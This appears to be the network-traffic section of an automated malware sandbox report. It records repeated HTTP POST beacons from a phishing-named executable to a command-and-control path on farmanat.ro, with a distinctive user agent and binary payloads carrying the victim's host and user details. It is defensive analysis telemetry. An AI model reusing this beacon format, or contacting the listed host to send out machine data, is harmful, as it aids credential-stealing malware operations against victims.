                                              Date: Thu, 25 Nov 2021 09:52:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              514192.168.11.2050358176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:31.132268906 CET7030OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:31.165750980 CET7030OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:31.228099108 CET7031INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              515192.168.11.2050359176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:31.643580914 CET7031OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:31.677800894 CET7032OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:31.736886024 CET7032INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              516192.168.11.2050360176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:32.168792963 CET7033OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:32.203115940 CET7033OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:32.253784895 CET7033INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              517192.168.11.2050361176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:32.703571081 CET7034OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:32.737766981 CET7034OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:32.796001911 CET7035INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              518192.168.11.2050362176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:33.165057898 CET7035OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:33.198584080 CET7036OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:33.247881889 CET7036INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              519192.168.11.2050363176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:33.675960064 CET7037OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:33.710185051 CET7037OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:33.761866093 CET7037INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              52192.168.11.2049888176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:34.941843033 CET6382OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:34.976138115 CET6382OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:35.026457071 CET6382INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              520192.168.11.2050364176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:34.188796043 CET7038OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:34.223037958 CET7038OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:34.276300907 CET7039INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              521192.168.11.2050365176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:34.702326059 CET7039OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:34.735831976 CET7040OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:34.792382956 CET7040INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              522192.168.11.2050366176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:35.210581064 CET7041OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:35.244793892 CET7041OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:35.300080061 CET7041INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              523192.168.11.2050367176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:35.688599110 CET7042OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:35.722184896 CET7042OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:35.772387981 CET7043INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              524192.168.11.2050368176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:36.166352034 CET7043OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:36.200638056 CET7044OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:36.252363920 CET7044INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              525192.168.11.2050369176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:36.667413950 CET7045OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:36.700978041 CET7045OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:36.750554085 CET7045INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              526192.168.11.2050370176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:37.177629948 CET7046OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:37.211122990 CET7046OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:37.260508060 CET7047INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              527192.168.11.2050371176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:37.684361935 CET7047OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:37.718498945 CET7048OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:37.768307924 CET7048INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              528192.168.11.2050372176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:38.201109886 CET7049OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:38.235380888 CET7049OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:38.293354034 CET7049INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              529192.168.11.2050373176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:38.676992893 CET7050OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:38.711014986 CET7050OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:38.760119915 CET7051INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              53192.168.11.2049889176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:35.542264938 CET6383OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:35.575865030 CET6383OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:35.624941111 CET6384INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              530192.168.11.2050374176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:39.142414093 CET7051OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
